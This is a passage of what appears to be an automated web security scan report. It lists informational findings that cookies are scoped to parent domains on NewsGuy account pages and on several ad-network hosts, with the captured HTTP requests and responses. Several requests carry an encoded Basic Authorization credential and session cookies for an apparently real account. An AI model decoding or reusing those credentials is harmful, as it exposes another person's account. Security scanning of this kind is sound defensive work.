P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=alnYSwtZdPuoP7SpJnHoOn6TC7uVaZblA87K1ygX0f1hWyZaf6EZanRaimVUiRN9IbgAkGg1BT4ERS3XZcApBAXusAVvGZcoKa4EAukyTAwZbPf3HZdeC8vRYsIZcwZbZbUlgTx2pGMLGTUxSpnpnuGgneS4uRH3F5UIxyV2vItfFS4p24eqKnVPrweM91kBCNbZaOJZcDFjxos4ePmdX9ScRZcCH4xkEGVN30HIh9PAFi7B076lbqqZbZdvgymSbR4XnZaYtW7YU66NirjJYfbFR3Zd1VIDlOQtDHUTykSEIT; path=/; domain=.tribalfusion.com; expires=Mon, 25-Apr-2011 01:35:47 GMT;
Content-Type: text/html
Location: http://tag.admeld.com/pixel?admeld_adprovider_id=12&expiration=30days&custom_segment4=1&custom_segment504=1&redirect=http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615
Content-Length: 0
Connection: keep-alive


13.42. https://acc.newsguy.com/a/memsubmit.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /a/memsubmit.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=9X4cj3HMWW55_p6OOm9h6em4opp0oWW0L4d3d945a; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a/memsubmit.asp HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:46 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: session-id=0e2d0ec1250f132ad68e906f4c3629b3; path=/
Set-Cookie: DIGEST=9X4cj3HMWW55_p6OOm9h6em4opp0oWW0L4d3d945a; path=/; domain=.newsguy.com;
Content-Length: 5174
Expires: Mon, 24 Jan 2011 15:01:46 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>NewsGuy - Membership Drive</title>
<meta NAME="description" CONTENT="Automatically read, post, decode and track newsgroup messages
...[SNIP]...

13.43. https://acc.newsguy.com/user/-/accnt_billing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_billing

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_billing HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/customer_referrals
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 22337

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Billing Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

13.44. https://acc.newsguy.com/user/-/accnt_contact

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_contact

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_contact HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_billing
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 8709

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Contact Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

13.45. https://acc.newsguy.com/user/-/accnt_flash

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_flash

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_flash HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:13 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 11585

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Flash Report</TITLE>
<script src="/accnt_forms.js"></script>
<script src="/accnt_ref.js"></script>
<script src="/lotto.js"></script>
</HEAD>

<bo
...[SNIP]...

13.46. https://acc.newsguy.com/user/-/accnt_history

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_history

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_history HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_contact
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:44 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 5814

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Purchase History</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

13.47. https://acc.newsguy.com/user/-/customer_referrals

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/customer_referrals

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/customer_referrals HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:29 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17318

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Referral Credits</TITLE>
<script src="/referrals.js"></script>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#265
...[SNIP]...

13.48. https://acc.newsguy.com/user/-/referrals_cashout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/referrals_cashout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/referrals_cashout HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=obHFXmnhMbJX5LfJRNZRWemqopp0oWW0L4d3d924f

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:10 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3297

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Account Administration - CashOut! Referral Credits</title>
<meta NAME="description" CONTENT="Automatically read, post, de
...[SNIP]...

13.49. https://acc.newsguy.com/user/accnt_overview

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_overview HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:35 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Overview</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

13.50. https://acc.newsguy.com/user/accnt_renew

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_renew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_renew HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Renew Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmargi
...[SNIP]...

13.51. https://acc.newsguy.com/user/accnt_settings

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_settings

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_settings HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Settings</TITLE>
<script src="/accnt_forms.js"></script>
<script language="JavaScript">
<!-- calculate available quotas by values type in
...[SNIP]...

13.52. https://acc.newsguy.com/user/accnt_signup_usenet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_signup_usenet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_signup_usenet HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:45 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Add a Usenet Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" le
...[SNIP]...

13.53. https://acc.newsguy.com/user/accnt_upgrade

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_upgrade

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_upgrade HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:42 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Upgrade My Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" left
...[SNIP]...

13.54. http://action.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
  • clid=2lebnns011706ch47d7o8wtv18e3v00g0o02050210f; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
  • orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
  • rdrlst=...[SNIP]...; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
  • sglst=...[SNIP]...; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=4548&pcv=47 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv181qq00f0o01050110e; rdrlst=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; sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000050o01050110582gletz4d0pqa500a0l000400100ag2leqh190t8d900c0o01050110c82hlebnns181qq00f0o01050110e9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000010o010501101820lebnns181qq00e0l000400100b0olfjpei000000010o010501101ab4lebnns181qq00f0o01050110e9szlebnns181qq00f0o01050110e8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b138c700e0o01050110eal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000010o0105011018bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000010o01050110140slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000020o01050110240uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; 
vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv18e3v00g0o02050210f; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo000000060o020502106ag2leqh190tkqe00d0o02050210d82gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns181qq00g0o02050210f5q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000020o020502102820lebnns181qq00e0l000400100b0olfjpei000000020o020502102ab4lebnns181qq00g0o02050210f9szlebnns181qq00g0o02050210f8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b13kpc00f0o02050210fal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns181qq00e0l0004001007y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei000000020o020502102b08lfjpei000000020o02050210240slebnns181qq00e0l00040010045mlfdxmc000000030o020502103a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?t=2&id=961073&id=1146992&id=1146943&id=1146965&id=1146949&id=750331&id=643545&id=970658&id=750295&id=276802
Content-Length: 0
Date: Tue, 25 Jan 2011 01:35:46 GMT


13.55. http://ad.doubleclick.net/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • id=c653243310000d9|1323822/422931/14998|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3a99/f/b2/*/d;234819764;0-0;0;55748943;4307-300/250;40168029/40185816/1;;~sscs=?http:/r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D28533%26rURL%3D/webbmipage1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=http:%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D28533%26rURL%3D/webbmipage1
Set-Cookie: id=c653243310000d9|1323822/422931/14998|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
